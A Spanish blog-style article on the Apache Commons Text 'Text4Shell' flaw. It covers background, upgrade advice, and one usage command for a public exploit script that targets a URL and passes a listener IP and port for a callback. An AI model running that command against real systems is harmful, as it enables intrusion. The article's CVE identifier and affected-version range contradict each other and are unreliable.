Introducción

En el vertiginoso mundo de la ciberseguridad, es esencial estar al tanto de las vulnerabilidades que pueden afectar a sistemas ampliamente utilizados. En este artículo, exploraremos en profundidad la vulnerabilidad Text4Shell de Apache, sus implicaciones y la manera de mitigar los riesgos asociados.

Contexto de la Vulnerabilidad

La vulnerabilidad Text4Shell se encuentra en la biblioteca Apache Commons Text, una alternativa a las funcionalidades nativas del JDK de Java. Las versiones anteriores a la versión 1.10.0 de Apache Commons Text están afectadas por esta vulnerabilidad, similar al conocido CVE-2022-33980.

El Script Riskootext4shell

Para comprender mejor esta amenaza, es esencial conocer el script riskootext4shell, diseñado específicamente para explotar la vulnerabilidad en text commons <= 1.10 (CVE-2022-33980). Este script, disponible en el repositorio de GitHub riskootext4shell, ofrece una herramienta potente para identificar y aprovechar posibles debilidades en sistemas vulnerables.

Ejemplo de Uso del Script

Una demostración práctica de la amenaza que representa Text4Shell es evidente en el siguiente ejemplo de uso del script:

python3 text4shell.py -u http://192.168.245.111:8080/search?query= -i 192.168.111.186 -p 22

Este comando ilustra la capacidad del script para comprometer la seguridad al aprovechar la vulnerabilidad en sistemas que ejecutan versiones vulnerables de Apache Commons Text.

Medidas de Mitigación

Ante esta amenaza latente, es crucial implementar medidas de mitigación efectivas. La solución principal consiste en actualizar de manera urgente el componente Apache Commons Text a versiones que aborden y corrijan esta vulnerabilidad. Se recomienda específicamente actualizar a la versión 1.10.0 o posteriores.

En la versión 1.10.0 y posteriores, se ha tomado la decisión de deshabilitar por defecto aquellas sustituciones problemáticas. Este cambio se refleja en el changelog de la librería, donde se especifica:

Make default string lookups configurable vía system property. Remove dns, url, and script lookups from defaults. If these lookups are required for use in StringSubstitutor.createInterpolator(), they must be enabled vía system property. See StringLookupFactory for details.

Desde Apache, se ha emitido un comunicado oficial que proporciona información detallada sobre la vulnerabilidad y una referencia a la actualización que soluciona el problema.

¡Protege tu sistema y mantén tu infraestructura segura!